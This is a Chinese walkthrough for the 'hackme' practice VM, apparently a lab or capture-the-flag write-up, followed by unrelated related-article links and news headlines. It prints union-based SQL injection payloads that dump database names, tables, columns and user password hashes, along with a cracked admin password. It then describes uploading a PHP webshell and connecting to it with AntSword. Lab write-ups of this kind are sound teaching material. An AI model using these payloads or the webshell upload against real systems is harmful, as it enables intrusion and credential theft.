当前位置: 首页 > news >正文

hackme靶机通关攻略

news 来源:原创 2025/5/17 16:39:14
第一步:确定靶机IP

第二步:使用御剑后台扫描工具扫描敏感文件

第三步:访问register.php注册登录,进入welcome.php页面

第四步:访问一个不存在的页面,确定网站使用的中间件是Apache(无用)

第五步:返回welcome.php页面,单点search会出现很多书,推测存在SQL注入漏洞

第六步:确定闭合方式为单引号

第七步:判断字段数为3、判断回显位置

第八步:爆破数据库名、爆破表名、爆破字段名

#爆破数据库名
OSNT' union select database(),2,3#

#爆破表名
OSNT' union select 1,2,table_name from information_schema.tables where table_schema='webapphacking'#

#爆破字段名
OSNT' union select 1,2,column_name from information_schema.columns where table_name='users'#

#爆破敏感信息
OSNT' union select 1,2,group_concat(name,'~',pasword) from users#

#发现管理员账户
superadmin~2386acb2cf356944177746fc92523983

#MD5解密密码
Uncrackable
第九步:登录管理员账户,发现上传文件的地方,尝试直接上传一句话木马shellshellshell.php

第十步:访问http://192.168.0.107/uploads/,发现成功上传,使用蚁剑连接,成功!

                                                                                                                        FROM  IYU_

相关文章:

  • Java数组详解(一)
  • IDE 使用技巧与插件推荐:全面提升开发效率
  • vue3+ts+vite环境中使用json-editor-vue3,记录遇到的奇奇怪怪问题!!!
  • 三格电子Modbus TCP转CANOpen网关相关问答
  • 【vscode-01】vscode不同项目不同语言扩展插件隔离方案
  • 智算新纪元,腾讯云HAI-CPU助力法律援助
  • 提升工地安全:视觉分析助力挖掘机作业监控
  • 夜莺监控 v8.0 新版通知规则 | 对接企微告警
  • 前端面试:如何实现预览 PDF 文件?
  • PostgreSQL 日常SQL语句查询记录--空间查询
  • 单体架构、微服务组件与解决方案
  • 开VR大空间体验馆,如何最低成本获取最大收入?
  • RabbitMQ 实现原理及流程
  • 多线程--参数传递之间的关系
  • react和vue 基础使用对比
  • Docker文件夹上传秘籍Windows下的高效传输之道
  • hcia华为路由器静态路由实验配置
  • 泰山派开发之—Ubuntu24.04下Linux开发环境搭建
  • 如何使用GuzzleHttp库:详细教程与代码示例
  • android 调用wps打开文档并感知保存事件
  • 新华时评:博物馆正以可亲可近替代“高冷范儿”
  • 自然资源部:不动产登记累计化解遗留问题房屋2000多万套
  • 定制基因编辑疗法治愈罕见遗传病患儿
  • 350种咖啡主题图书集结上海,20家参展书店买书送咖啡
  • 年在沪纳税350亿人民币,这些全球头部企业表示“对上海承诺不会变”
  • 上海市重大工程一季度开局良好,多项生态类项目按计划实施